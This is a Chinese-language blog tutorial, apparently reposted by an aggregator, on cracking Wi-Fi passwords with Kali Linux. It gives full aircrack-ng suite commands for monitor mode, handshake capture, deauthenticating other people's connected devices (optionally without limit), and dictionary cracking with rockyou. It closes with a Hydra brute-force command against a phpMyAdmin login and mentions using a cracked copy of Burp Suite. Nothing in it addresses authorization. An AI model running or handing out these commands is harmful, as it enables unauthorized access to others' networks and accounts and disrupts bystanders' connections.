Kali中网卡配置_Wifi扫描_抓包_密码破解
Posted 叫我阿笑就好了
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Kali中网卡配置_Wifi扫描_抓包_密码破解相关的知识,希望对你有一定的参考价值。
设备:Kali系统+一块外接无线网卡
网上搜Kali 网卡 选择购买即可.
1.配置网卡
1.默认的VMware USB是没有开启的,需要手动开启.
window键+r->输入services.msc->找到VMware USB Arbitration Service 开启
虚拟机->可移动设备->找到自己无线网卡设备->连接即可.
当时弄了一会不知道自己网卡是否安装成功-_-
可以在右下角查看虚拟机是否识别到无线网卡设备.
)
或者打开终端输入
airmon-ng
出现wlan0即可
2.Wifi扫描和抓包
1.开启网卡的监听模式,监听模式开启后wlan0名字会变成wlan0mon
airmon-ng start wlan0
2.开始扫描
airodump-ng wlan0mon
退出扫描
ctrl+c
问题: 第一次扫描时有扫描信息,因不知原因重新扫描后没有扫描信息(不知道啥原理)
解决: 将无线网卡断开后重新连接.
3.开始抓包
airodump-ng --bssid BSSID -c CH -w 抓包存储的路径 wlan0mon
这里说下BSSID和CH是你之前扫描时得到的Wifi的mac地址和信道频率
抓包成功标志:
看到WPA handshake:mac地址
4.把别人连接到Wifi的设备T下线(没抓到包时)
aireplay-ng -0 数字 -c STATION -a BSSID wlan0mon
数字指的是攻击次数,设置为0时一直攻击
STATION是连接wifi设备的mac地址
BSSID是Wifi的mac地址
抓完包记得把攻击停止
第二种扫描方式wifite
命令wifite,选中一个target即可
3.用字典文件开始破解密码
解压自带字典文件:
gzip -d /usr/share/wordlists/rockyou.txt.gz
破解
aircrack-ng -w 字典文件 抓包获得的文件
aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/home-03.cap
字典文件就是一字典
抓包的文件是.cap后缀名
这里补充下对linux目录结构介绍,如果破解命令出错一般是你当前目录没有切换到/
/--
|
|root(~)
|home
home就是你当前账户,root就是root用户,一般显示为~.
使用kali Hydra暴力破解phpadmin网站(失败)
参考技术A 一个没有保护措施的phpadmin后台。在github上找到字典,或者使用kali自带字典
用burp抓包后找到url和错误信息,按照hydra的语法写下语句
有一个困扰了很久的点是,最开始的一遍扫描成功不了,原因是只写了ip没有改端口。导致其实一直在扫一个404页面。
-s选项可以更改端口。
最终命令:
hydra -L Top20_Admin_Users.txt -P FastPwds.txt -V -t 4 -e ns -f -s 88 xx.xx.xx.xx http-post-form "/xxx:xxx=^USER^&xxx=^PASS^&server=1&token=2bbde9ea85a0ac2da88dd37a84c63d57:#1045 Cannot log in to the MySQL server"
很奇怪的是每一个测试都成功了,使用代理后检测才发现发出去的request很奇怪导致获取不了正确的包。
改用burpsuite,在参考别人文章后安装破解版burpsuite,发现这个东西用来web攻击很好用。
phpmyadmin有一个防御机制,发送第一个包到后台后,会重新发送一个get请求,在cookie里面带上加密的username和password。解决方法没找到。最终破解失败。
有任何问题可以私信我。
以上是关于Kali中网卡配置_Wifi扫描_抓包_密码破解的主要内容,如果未能解决你的问题,请参考以下文章